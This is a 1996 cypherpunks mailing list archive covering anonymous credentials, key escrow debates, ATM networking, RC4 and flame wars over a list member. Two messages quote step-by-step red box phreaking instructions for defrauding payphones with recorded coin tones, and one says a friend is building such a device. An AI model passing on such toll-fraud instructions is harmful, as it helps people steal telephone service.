are forgiven, but patterns of repetitive bad conduct are punished.  I
believe protocols similar to the ones Jim McCoy mentioned from Chaum
can provide very flexible (although possibly inefficient) means for
controlling credentials in a variety of ways.

In the context of limited-participation credentials, then, a reasonable
policy would be not to strictly cut off anyone who broke the contract,
but rather to consider extenuating circumstances.  For example, if a
credential is stolen and the owner is aware of it (say it is locked in
a hardened smart card), and he can prove that he made a good faith effort
to notify service providers that they should invalidate the credential,
then this would excuse misbehavior.  Even without this kind of evidence,
it may be appropriate to give people a limited number of second chances.

True, this allows an unscrupulous person to violate the rules some
number of times and get away with it.  However this may be tolerable
as a generally low level of background noise.  No society is perfect.
Being able to largely deter contract violations while still maintaining
privacy for the participants would in my opinion be superior to the
world we seem to be heading towards, one in which dataveillance, profiling,
and tracking are the norm.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tavik@alias.cyberpass.net
Date: Tue, 22 Oct 1996 10:47:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Japanese Export Restrictions
Message-ID: <199610221646.JAA07921@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


schryver@radiks.net allegedly wrote:
> Has any one been able to verify the anonymous posters assertion concerning
> japanese crypto export restrictions?

What counts as verification?  I heard it straight from a crypto exporter
in Japan, as the reason why the stuff they were sending me would be delayed,
and by the way they needed more information for the export request.  I
might even be the original source of the news since I did mention it to
a freind or two.  (I am not the original anon poster).  As to the details
re: if/when/why the change was made, etc., I don't know.

Is there a Japanese equivalent of the CFR wherein the government regs are
published?  Perhaps one of our bureau-savvy Japanese readers could check
into it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 22 Oct 1996 06:52:35 -0700 (PDT)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Pearls before swine
Message-ID: <9609228460.AA846003008@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Throwing beads before swine is not forbidden.
Throwing pearls before swine is what you want to avoid.

If you think of cypherpunks as swine and your knowledge as pearls of wisdom,
perhaps you should stop throwing your pearls before us swine.

James

----------
From:   dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Sent:   Monday, October 21, 1996 8:10 PM
To:     cypherpunks@toad.com
Subject:        Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,5

I think to talk about cryptography to the San Francisco 
Cypherpunks is to throw beads before the swine.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 22 Oct 1996 09:59:51 -0700 (PDT)
To: Rich Graves <rcgraves@ix.netcom.com>
Subject: Re: Interesting article on ATM in Wired (of all places)
Message-ID: <9610221659.AA17564@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


We passed that article around the office here.. I found it interesting
as I've not been a fan of ATM so far...

My boss knows a guy at Sprint (in the article, there's a guy from
Sprint's Internet group that has bad things to say about ATM, and
says they aren't going to use it) so he called him up and asked about 
the article.  They guy says "WHAT?  We're installing a huge ATM network!
Fax me that article!"

The left doesn't know what the right hand is doing.  Sounds like
every place I've ever worked..

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: rcgraves @ ix.netcom.com (Rich Graves) @ smtp
Date: 10/21/96 11:22:08 PM
Subject: Interesting article on ATM in Wired (of all places)

Since I ordinarily do nothing but bash the journal of hype and unreadable
blue-on-orange type, I figured I should express appreciation for Steve
Steinberg's "Netheads vs. Bellheads" article starting on page 145 of the
October issue. The ATM v. real networks battle is one that is becoming
increasingly important at gads of institutions, such as mine. In addition
to economic efficiency, there are civil liberties reasons to favor the
current packet-switched technology over circuit-switched bit-mangling. The
nexus on this technical front isn't as tight as it is on the encryption
front, but I'd urge people in positions of technical or budgetary
responsibility to line up with the good guys, i.e., us netheads. You don't
want an Internet controlled by ATM technology. It would make censorship,
wiretapping, and other forms of nastiness by government and other armed
thugs far too easy. I'm speaking only for myself, of course, and of course
there are technical reasons I'd prefer to implement gigabit Ethernet as
well. 

The leader "Why the net should grow up" in the October 19th issue of _The
Economist_, whose net reporting has improved markedly with the addition of
some new staff, may also be of interest. Some overlaps with the Wired
article, though the writers probably weren't technically savvy enough to
realize that they were talking about the same thing. More comments on that
when I find time. 

-rich







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Tue, 22 Oct 1996 01:04:53 -0700 (PDT)
To: Dale Thorn <cypherpunks@toad.com
Subject: Re: Comments on binding cryptography (1)
Message-ID: <869FB0F2C3B@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


For the last time I react on these (political) issues, and then I will gladly 
return to business. Our views should be clear by now.

> So Bert, let's just call a spade a spade, eh?  Since you readily agree 
> that organized criminals probably won't use binding crypto, 
I agree.

> and that 
> TRP's will probably leak our info to spy "agencies" and so on, 
I don't agree.

> it's public knowledge that the Justice Dept. does this sort of thing 
> here, so knowing that, are you still suggesting we trust them, simply 
> because you trust your government?  
I am not suggesting anything of the kind.

I suggested we had a difference of opinion, and I can very well live 
with that. It's a matter for you to decide in the States, and for us 
to decide in the Netherlands/Europe. My only concern is that measures 
we take are compatible with foreign measures (mark compatible, not 
the same), and that the US is not pushing foreign states into measures 
they don't really want to take.

I suggest you try and read what people write first, instead of skimming 
through a message and jumping to conclusions.

Bert-Jaap




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 22 Oct 1996 10:30:15 -0700 (PDT)
To: Alex de Joode <cypherpunks@toad.com
Subject: Re: Prof Shamir arrested
Message-ID: <199610221729.KAA26886@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:01 PM 10/22/96 +0200, Alex de Joode wrote:
>Bert-Jaap Koops (E.J.Koops@kub.nl) wrote:
>: Jim Bell wrote:
>: [many things on "fraud"]
>
>: Excuse me if I don't react on this in detail. We have already 
>: explained it, and there it stands: fraud means playing a game without 
>: abiding by its rules. It's perfectly legitimate to establish a game 
>: and to introduse rules of the game with it. If you want to play the 
>: game, play by its rules, otherwise don't play it. If you play it 
>: while cheating, though, you must bear the consequences ("go directly 
>: to jail" ;-).
>
>: Bert-Jaap
>
>What Mr. Bell probably means is that 'if the powers that be' decide 
>to unilateraly change the rules, you are lost in limbo.

That's certainly one of my points.  There is a concept in data theory called 
"Hamming distance," which is basically the number of steps it takes to go 
from "here" to "there."  If we're excessively generous and call the 
countries we live in "free," the question is how much effort is required to 
move that country to a totalitarian system.  If everyone uses encrypted 
telephones whose codes can't be broken, with no GAK-misfeature, the 
government can't easily force everyone to change to a situation where 
everyone fears being wiretapped.  Assume a typical GAK system however, and 
there's apparently nothing to prevent things from going from free to unfree 
literally overnight.  

I've asked Koops to explain how he can help prevent fraud _by_ the 
government; he's silent on this point.  I have to conclude that he doesn't 
consider that to be an issue.  I think it's a big issue.

> The notion
>that 'the powers that be' can be relied opun is seriously flawed,
>for example take in account some of the dealings of our own guvment,
>the abolishing of the WIR -overnight-, the proposals of Vermeent
>that totally neglected art. 1 WvSr.
>
>Basicly 'fraud' is a definition that benefits 'the powers that be',
>one that seriously harms our rights and liberties. You also state
>"If you want to play the game, play by its rules, otherwise don't 
>play it." Well sometimes people have no other option then to play,
>and dropping out if gouvernment changes the rules unilateraly can 
>be to costly an option ..


One of the things that Koops has repeated failed to do is to show how his 
invention would actually be desired by the users, enough to implement it.  
Why, exactly, would a person adopt a system like it?  To whatever extent his 
system is a "solution in search of a problem," he needs to show what kind of 
problems would need that solution, and would it work?  Why would a person 
participate in any sort of cooperative effort that might, hypothetically, 
make him guilty of "fraud"?  Only because he's getting some benefit.  

I don't totally reject the possibility that a group of people might 
willingly set up some sort of shadow-Internet network possibly with better 
performance, agreeing among themselves to restrict encrypted communications 
to some type of GAK system, but it's necessary to ask what the benefit would 
be in doing this.  Or, more particularly, why couldn't they set up the same 
network without any such agreement?  Proposals like those of Mr. Koops will 
always fail if people can get benefits without agreeing to the costs, and 
it's clear that there are no strong reasons to adopt a mutually-agreed 
GAK-type system without some sort of external coercion. (Either bribing such 
an organization with money based on funds stolen from taxpayers, or 
punishing everyone who doesn't agree with higher taxes, or both.)  This 
means that Koops' proposal is inextricably linked to government extortion, 
which is why we challenge it.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Tue, 22 Oct 1996 01:32:25 -0700 (PDT)
To: jim bell <cypherpunks@toad.com
Subject: Re: Prof Shamir arrested
Message-ID: <86A6FCB1737@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell wrote:
[many things on "fraud"]

Excuse me if I don't react on this in detail. We have already 
explained it, and there it stands: fraud means playing a game without 
abiding by its rules. It's perfectly legitimate to establish a game 
and to introduse rules of the game with it. If you want to play the 
game, play by its rules, otherwise don't play it. If you play it 
while cheating, though, you must bear the consequences ("go directly 
to jail" ;-).

Bert-Jaap

---------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law, Administration and      facs    +31 13 466 8149
Informatization, Tilburg University     e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
         http://cwis.kub.nl/~frw/people/koops/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcard@st6000.sct.edu (Justin Card)
Date: Tue, 22 Oct 1996 08:02:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RC4 analysis
Message-ID: <9610221459.AA92962@st6000.sct.edu>
MIME-Version: 1.0
Content-Type: text/plain


Has anybody out there done any significant analysis of the RC4 stream
cipher?  What I am interested in is the expected cycle length of the 
standard implementation (256 byte state table)?  Working with the reduced
sizes, the cycle length appears to grow exponentially, but I am unsure how
to verify this.  

Have there been any other results surfacing besides the reports on weak keys?

thx.
Justin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Kuethe <ckuethe@gpu.srv.ualberta.ca>
Date: Tue, 22 Oct 1996 10:40:51 -0700 (PDT)
To: Randy Bradakis <Lsurfer@cris.com>
Subject: Re: More threats from FOTM (Friends of Timmy May)
In-Reply-To: <RdCbyozvQsBA091yn@cris.com>
Message-ID: <Pine.A32.3.93.961022113930.94508D-100000@gpu1.srv.ualberta.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Oct 1996, Randy Bradakis wrote:

> Nyekulturnoo?
> 
> nYEH KulTCHURnoo, I think is the vaguely phonetic spelling.
> And I don't recall _where_ I remember that from.
> 
> The human formerly known as "bdolan@USIT.NET (Brad Dolan)" wrote:
> {Something like "ne(o)cultorney," I think.
> {On Tue, 15 Oct 1996, Sandy Sandfort wrote:
> {> Does anyone remember the Russian word for "uncultured"?  It was
> {> in one or two of Tom Clancy's books.
> 
> -- 
> no sig too small
> 

The word of which you speak, Comrade, is "Nekulturny."
--
Chris Kuethe <ckuethe@gpu.srv.ualberta.ca> LPGV Electronics and Controls

RSA in 3 lines of PERL:
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 22 Oct 1996 13:21:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <Pine.SUN.3.91.961022061727.26530B-100000@crl10.crl.com>
Message-ID: <m1i8VD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
> 
> > Tsk tsk. You're not begging. You're not groveling. How do you plan
> > to convince me that you're worthy?
> 
> I have no such plan because I feel nothing but moral, cultural,
> social and intellectual superiority to Dimitri.  I invited him to
> California out of curiosity.  I studied slime mold in biology
> class for the same reason.  He has been made a generous offer.  
> It still stands.  It's his decision to be either a man our a 
> mouse (or a slime mold).  If he grows some gonads, I'll be very
> surprised but pleased.  In the meantime, I expect he will keep up 
> his cowardly, shoot-from-ambush attacks.  No matter, we've all 
> seen worse.

You yourself doubt that you are worthy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kip DeGraaf <kip@monroe.lib.mi.us>
Date: Tue, 22 Oct 1996 08:58:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: SPA's Press Release
In-Reply-To: <19961016221000468.AAA176@maverick>
Message-ID: <Pine.SUN.3.91.961017083909.16395A-100000@monroe.lib.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Does this mean that Alta Vista and FTPsearch are going to be sued also?  
FTPsearch is at http://ftpsearch.unit.no and has been used by thousands 
to find the latest "warez" depositories.

On Wed, 16 Oct 1996, Sean Sutherland wrote:

> Note the "should have known." Here's their specification for this, 
> copied from http://www.spa.org/piracy/risk.htm.  
> 
> "Anyone who knows or should have known that he or she is assisting,
> inducing or materially contributing to infringement of any of the
> exclusive rights by another person is liable for contributor infringement."
> ie -
>      linking to FTP sites were software may be unlawfully obtained 
>      informing others of FTP sites were software may be unlawfully obtained 
>      aiding others in locating or using unauthorized software 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: h2@juno.com (Michael B Amoruso)
Date: Tue, 22 Oct 1996 09:13:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Finally  --  A crypto question from me...HD encryption
Message-ID: <19961022.120701.9990.2.h2@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Are there any good programs out there that can encrypt my HD??  Since
there probably are, please mention some and where I can get them.  Also,
no one mention PGP.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: h2@juno.com (Michael B Amoruso)
Date: Tue, 22 Oct 1996 09:15:20 -0700 (PDT)
To: pneyz@armory.com
Subject: Re: Blue Box Plans & hacker bbs's
In-Reply-To: <Pine.SCO.3.91.961021164621.18461G-100000@deepthought.armory.com>
Message-ID: <19961022.120700.9990.1.h2@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh yeah I forgot one thing.  What do you mean by NPA and why cant i just
dial like a regualr call??  And what is a DMTF dialer?

On Mon, 21 Oct 1996 16:50:42 -0700 (PDT) Perry Farrell <pneyz@armory.com>
writes:
>> Also, the network's signalling has changed, and the basic 
>> Captain Crunch Whistle doesn't work many places any more -
>> most of the signalling is digital out-of-band rather than
>> inband audio.  Phreaking isn't impossible (or there wouldn't be 
>> as many people chasing the Dread Pirate Mitnick), but at this point
>> you actually need to know what you're doing to succeed at it,
>> and merely having plans for a device you don't know well enough to
>> emulate in code on your PC isn't going to buy you much.
>
>Very good point, phreaking's getting tricky. First of all, forget blue 
>
>boxes, they're worthless, especially to an amateur, which you (HeLiuM) 
>
>obviouisly are. Get a red box. Go to Radio Shack and buy a digital 
>recorder pocket memo thing. They're about ten bucks and it's alot 
>easier 
>than getting a handheld DTMF dialer (which is annoying to solder 
>because 
>RS doesn't make them very well). Get BlueBeep or something 
>(ftp.fc.net/pub/defcon/BLUEBEEP) and record some quarter tones. Go to 
>a 
>Bell payphone (CoCoTs and USWest phones do not work) and dial 
>"1+area+npa+number", like a normal call. Then play the tones. For a 
>local 
>call, dial "10288+area+npa+number", which makes AT&T think it's along 
>distance call. 
>
>					pneyz (pneyz@armory.com)
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: h2@juno.com (Michael B Amoruso)
Date: Tue, 22 Oct 1996 09:17:36 -0700 (PDT)
To: pneyz@armory.com
Subject: Re: Blue Box Plans & hacker bbs's
In-Reply-To: <Pine.SCO.3.91.961021164621.18461G-100000@deepthought.armory.com>
Message-ID: <19961022.120700.9990.0.h2@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the tip!  My friend is good with electronics and he is
building a red box using all chips and shit.  He found out some equation
to use so when a capacitor fills up and then discharges to a resistor,
using a certain equation u can generate frequencys.  I also found out
that you can do the same with QBasic.  I wish there was a way to blue
box, but it seems that there's not.  Thanks for everything.

On Mon, 21 Oct 1996 16:50:42 -0700 (PDT) Perry Farrell <pneyz@armory.com>
writes:
>> Also, the network's signalling has changed, and the basic 
>> Captain Crunch Whistle doesn't work many places any more -
>> most of the signalling is digital out-of-band rather than
>> inband audio.  Phreaking isn't impossible (or there wouldn't be 
>> as many people chasing the Dread Pirate Mitnick), but at this point
>> you actually need to know what you're doing to succeed at it,
>> and merely having plans for a device you don't know well enough to
>> emulate in code on your PC isn't going to buy you much.
>
>Very good point, phreaking's getting tricky. First of all, forget blue 
>
>boxes, they're worthless, especially to an amateur, which you (HeLiuM) 
>
>obviouisly are. Get a red box. Go to Radio Shack and buy a digital 
>recorder pocket memo thing. They're about ten bucks and it's alot 
>easier 
>than getting a handheld DTMF dialer (which is annoying to solder 
>because 
>RS doesn't make them very well). Get BlueBeep or something 
>(ftp.fc.net/pub/defcon/BLUEBEEP) and record some quarter tones. Go to 
>a 
>Bell payphone (CoCoTs and USWest phones do not work) and dial 
>"1+area+npa+number", like a normal call. Then play the tones. For a 
>local 
>call, dial "10288+area+npa+number", which makes AT&T think it's along 
>distance call. 
>
>					pneyz (pneyz@armory.com)
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 22 Oct 1996 12:26:53 -0700 (PDT)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: [NOISE][dlv trash]Re: Timmy May is a jerk
In-Reply-To: <Pine.BSF.3.91.961022123550.15316B-100000@mcfeely.bsfs.org>
Message-ID: <Pine.SUN.3.91.961022115732.12356B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 22 Oct 1996, Rabid Wombat wrote:

> Sandy - nice try at shutting up the kook, but you're just giving him the 
> attention he craves at this point.
> 
> Not one person has spoken up publicly in defense of dlv; one person who 
> has met him did speak on his behalf via private mail, but appears to have 
> changed his mind. The points have been made. The best thing to do is drop 
> dlv into the killfile, and ignore him.

I think the Wombat may have this one nailed.  I have made the
same mistake others on this list have made--I assumed some 
semblance of rationality, civility and knowledge of appropriate
social behavior in another.  Giving someone the benefit of a
doubt is not a bad thing, but to continue doing so indefinitely
is.  

I'll let my offer of airfare, lodging and transportation stand 
through the end of the month, then it will automatically be 
withdrawn and the pledge partners will be off the hook.  If
Dimitri wishes to address a future meeting of SF Bay area 
Cypherpunks at our expense, he must unequivocally commit to it
before midnight (California time) October 31.  After that, it 
will be up to him to pay his own way or to pass the plate on his
own.  (Personally, I'm convinced that he is far to big a coward
to ever come here, no matter what the inducement.)

Other than with regard to my offer, I am taking RW's pledge.
Shunning works for the Amish; I think it can work for us too.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 22 Oct 1996 12:38:51 -0700 (PDT)
To: "Douglas B. Renner" <E.J.Koops@kub.nl>
Subject: Re: Prof Shamir arrested
Message-ID: <199610221938.MAA06850@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:28 PM 10/22/96 -0500, Douglas B. Renner wrote:
>On Tue, 22 Oct 1996, Bert-Jaap Koops wrote:
>> Excuse me if I don't react on this in detail. We have already 
>> explained it, and there it stands: fraud means playing a game without 
>> abiding by its rules. It's perfectly legitimate to establish a game 
>> and to introduse rules of the game with it. If you want to play the 
>  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>BIG Problem here.
>
>> game, play by its rules, otherwise don't play it. If you play it 
>> while cheating, though, you must bear the consequences ("go directly 
>> to jail" ;-).
>> Bert-Jaap

>I sincerely wish the world were THAT simple - there would be fewer problems.
[much good stuff deleted]
>In short, I disagree very strongly that it is as simple as playing by the 
>rules.  The first rule is that you cannot know all the rules.  Further, any 
>rule you _do_ know may be subject to change.  You have to become an 
>expert on what is likely to be static for your own purposes, and act 
>within the limits of your own knowledge.  Self-knowledge being perhaps our 
>greatest challenge, there are _bound_ to be problems on all sides.
>
>Perhaps the widespread dissemination of strong crypto will ultimately 
>have a scale-tilting effect on matters of taxation.
>-Doug

Thanks for helping to demolish Koops' argument, what little there is of it.  
It's particularly inappropriate that he would try to use a "game" analogy to 
defend his idea, because games are generally considered voluntary and it's 
obvious that his invention would not be used in a purely voluntary basis.  
Even if the only interference is the taxation of people who don't "play" and 
the subsidy of people who do, that can't be consider a voluntary arrangement.

I look at it this way:  Koops is building only one piece in a jigsaw puzzle 
of tyranny.  He doesn't want to talk about the complete picture, but it's 
there and it's not pretty.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 22 Oct 1996 12:40:31 -0700 (PDT)
To: rcgraves@ix.netcom.com (Rich Graves)
Subject: Re: Interesting article on ATM in Wired (of all places)
In-Reply-To: <199610220622.XAA26959@Networking.Stanford.EDU>
Message-ID: <199610221937.MAA14041@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Graves
>
>Since I ordinarily do nothing but bash the journal of hype and unreadable
>blue-on-orange type, I figured I should express appreciation for Steve
>Steinberg's "Netheads vs. Bellheads" article starting on page 145 of the
>October issue. The ATM v. real networks battle is one that is becoming
>increasingly important at gads of institutions, such as mine.

I liked this article too because it does anticipate something crucial
going on in the telecommunications/cyberspace arena.
however I think it's a huge disservice to cast the future of the internet in
terms of a black/white either/or situation of packet vs. 
circuit switching (you're already hot into the emotional rhetoric
by calling the latter "bit mangling").

who here believes that circuit switching is superior to 
packet switching or vice versa? it's a lame debate, like
arguing whether apples or oranges taste better. 

the future network is going to be a blending of both. it will be
a collision of the cultures mentioned in the article you cite.
it won't be a battle, it'll be a blending. both sides already
concede that the other side has advantages. already protocols
are being designed that incorporate both technologies. 

>I'd urge people in positions of technical or budgetary
>responsibility to line up with the good guys, i.e., us netheads.

give me a break. what you are essentially arguing about in the
two technologies is a timed, guaranteed bandwidth vs. packets that
arrive but without timing constraints. depending on the application,
either may be the appropriate choice. the network of the future will
support both. please, please do not try to polarize this simple
issue. there is absolutely no doubt that much technology, such
as audio/video broadcasting, needs "guaranteed bandwidth" as
offered by ATM. there is also no doubt that support thing kind
of guaranteed bandwidth is expensive and not superior for all
applications.

 You don't
>want an Internet controlled by ATM technology. It would make censorship,
>wiretapping, and other forms of nastiness by government and other armed
>thugs far too easy. I'm speaking only for myself, of course, and of course
>there are technical reasons I'd prefer to implement gigabit Ethernet as
>well. 

oh, brother. "circuit switching is the mark of the beast". I find
it rare to find technically adept people holding such irrational,
almost religious-like beliefs about technology. but it is highly
entertaining <g>

it never ceases to amaze me how much FUD is generated when a 
new technology is introduced. a bazillion people all cower
and scream, "gosh, could [x] mean the end of [y]?" apparently
this is far more fun than realizing, "gosh, [x] will find a 
niche ALONGSIDE [y], but neither will destroy the other".
this happened with Java and all the new languages, it happens
with the "network computer", etc. ad nauseaum. sigh!!
maybe it is a sign of a certain kind of intelligence that
can't simultaneously hold two ideas at the same time (like
walking and chewing gum? hee, hee)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 22 Oct 1996 11:10:16 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: [NOISE][dlv trash]Re: Timmy May is a jerk
In-Reply-To: <7H87VD38w165w@bwalk.dm.com>
Message-ID: <Pine.BSF.3.91.961022123550.15316B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 22 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Timmy May continues to post nonsensical praises in his name using
> an anonymous remailer....
> 

I doubt Tim May has posted this - he's done a fine job of staying out of 
this stupidity.

> Timmy May <anonymous@miron.vip.best.com> writes:
> 
> > Tim May's early support of the cypherpunk concept has helped

> 
> Timmy May is an ignorant coward. He's got nothing better to do,
> so he starts up flame wars on this mailing list. He can't contribute
> anything crypto-relevant because he knows nothing about cryptography.

As I recall, he posted ONE piece of satire back in August. It was a 
humourous jest, and you do make yourself an easy target. You've been on 
him ever since, which proves that you can't take a joke at all. Your 
rants have been the longest running one-sided response to a troll that I 
have ever seen. Quit while you're behind.

Sandy has made you a generous offer to come out to the west coast,
expenses paid, and enlighten everyone with your knowledge of crypto.
You seem to find all manner of excuses to avoid the trip, and are using 
his offer as a further opportunity to insult the list. 

> 
> This is a lie. Anyone who's been subscribed to this mailing list for
> a while knows that Timmy May posts to most personal attacks (inlcuiding
> attacks on his many enemies' religion and ethnicity), lies, fabricated
> quotes, flame bait, and overall noise.

Look in the mirror - attacks on religion, ethnicity, flame bait, NOISE ...

Fitting description of Dimitri, no?

Sandy - nice try at shutting up the kook, but you're just giving him the 
attention he craves at this point.

Not one person has spoken up publicly in defense of dlv; one person who 
has met him did speak on his behalf via private mail, but appears to have 
changed his mind. The points have been made. The best thing to do is drop 
dlv into the killfile, and ignore him.

I, diseased nocturnal marsupial, pledge to post no more crap to this list 
in response to, or regarding, one Dimitri Vulis, KOTM.

Take the pledge. Just say no.

-r.w.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Tue, 22 Oct 1996 03:02:13 -0700 (PDT)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Prof Shamir arrested
In-Reply-To: <Pine.BSF.3.91.961021182616.13069A-100000@mcfeely.bsfs.org>
Message-ID: <Pine.GSO.3.93.961022124228.1724B-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 Mon, 21 Oct 1996, Rabid Wombat wrote:

> Or is this the Avi Shamir who broke FEAL-8?

Can you tell more of this? There is an Windows disk encryption utility
called Teamware Crypto that uses FEAL-8. This program is quite popular in
Europe, distributed and made by ICL Data.

JK - jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Tue, 22 Oct 1996 05:49:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Dimitri goes to California - was Re: [SERDAR ARGIC] Ray Arachelian...
Message-ID: <9610221250.AA15145@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain







> Date: Mon, 21 Oct 1996 21:08:17 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>

> So it IS intellectual dishonesty and cowardice.  I thought so.
> Is there anyone on the list who thinks Dimitri is a man?


Not me.  Pick another speaker, poll the pledgers for
agreement and don't ask Dimitri again.

And just when I let him out of my killfile in the
hope I'd see him accept the challenge.


 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: c62op27@ibx.com (Victor Fiorillo)
Date: Tue, 22 Oct 1996 11:50:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Timmy May is a jerk
Message-ID: <9610221756.AA26360@ibx.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok, I'm a new subscriber.  I take it as a given that Timmy May is a jerk, but who is he?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@pc.jaring.my>
Date: Mon, 21 Oct 1996 17:14:57 -0700 (PDT)
To: Noorsham <noorsham@tm.net.my>
Subject: Re: Don't ask why, thank you.
In-Reply-To: <199610200616.OAA02136@gandalf.asiapac.net>
Message-ID: <96Oct22.081619gmt+0800.21892@portal.extol.com.my>
MIME-Version: 1.0
Content-Type: text/plain


Noorsham wrote:
> red wrote:
> > Why?
> >
> >         The purpose of life,... is not to be found. I have been pursuing
>        please understand that internet users come from variety backgrounds. What is right for you,
> may be just a rubbish for others and it can cause unnecessary wastage of resources.
> 
> "If you don't have any valuable to say, keep quiet".


Is'nt there a alt.philosophy in the news group? Perhaps it would be more
appropriate to point him in the right direction rather than "tembak" him
:)

Ciao!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Tue, 22 Oct 1996 14:51:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Negative credentials
Message-ID: <199610222151.OAA28844@crypt>
MIME-Version: 1.0
Content-Type: text/plain


There has been some discussion here and on the Simple Public Key
Infrastructure (SPKI) mailing list about anonymous credentials and
abuse.  This is something we have of course talked about many times
over the years but I don't think we have ever had a specific look at
